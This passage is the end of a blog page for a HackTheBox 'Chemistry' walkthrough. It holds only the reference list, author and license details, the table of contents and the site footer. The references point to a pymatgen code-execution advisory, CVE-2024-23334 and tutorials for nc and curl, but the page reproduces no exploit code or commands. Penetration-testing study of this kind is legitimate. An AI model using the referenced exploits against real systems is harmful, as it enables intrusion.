<li><a class="link"   target="_blank" rel="noopener" href="https://medium.com/@Vishal17/chemistry-htb-writeup-1647773e4280" >Chemistry HTB (writeup) <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f" >Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>\</li>
<li><a class="link"   target="_blank" rel="noopener" href="https://www.techtarget.com/searchsecurity/definition/proof-of-concept-PoC-exploit" >proof of concept (PoC) exploit <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://hackmd.io/@Not/nmapparameter" >Nmap 常用參數 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://ericbbs.blogspot.com/2007/11/linux-nc.html" >nc 指令 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://medium.com/@bondemit/sqlite3-%E5%9F%BA%E6%9C%AC%E6%8C%87%E4%BB%A4-ac7bbc567ec4" >SQLite3—基本指令 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://www.jinnsblog.com/2022/12/linux-curl-data-transfer-tutorial.html" >curl 指令 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://ethicalhacking.uk/cve-2024-23334-aiohttps-directory-traversal-vulnerability/#gsc.tab=0" >CVE-2024-23334 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://blog.gtwang.org/linux/socket-statistics-ss-command-tutorial/" >使用 ss 指令檢查 Linux 網路 Socket 狀態資訊教學 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
</ul>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> Chemistry - Walkthrough</li>
        <li><strong>Author:</strong> kting</li>
        <li><strong>Created at
                :</strong> 2024-12-16 17:33:37</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-12-16 19:25:55
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2024/12/16/Chemistry/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/HackTheBox/">#HackTheBox</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2024/12/21/DC-6/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">DC-6 - Walkthrough</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/12/16/Tr0ll-1/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">Tr0ll 1 - Walkthrough</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">Chemistry - Walkthrough</div>
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Step-1-Reconnaissance"><span class="nav-text">Step 1 - Reconnaissance</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Step2-Information-Gathering"><span class="nav-text">Step2 - Information Gathering</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Step3-Lateral-Movement"><span class="nav-text">Step3 - Lateral Movement</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#References"><span class="nav-text">References</span></a></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">kting</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        11 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.7.1</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>










</body>
</html>
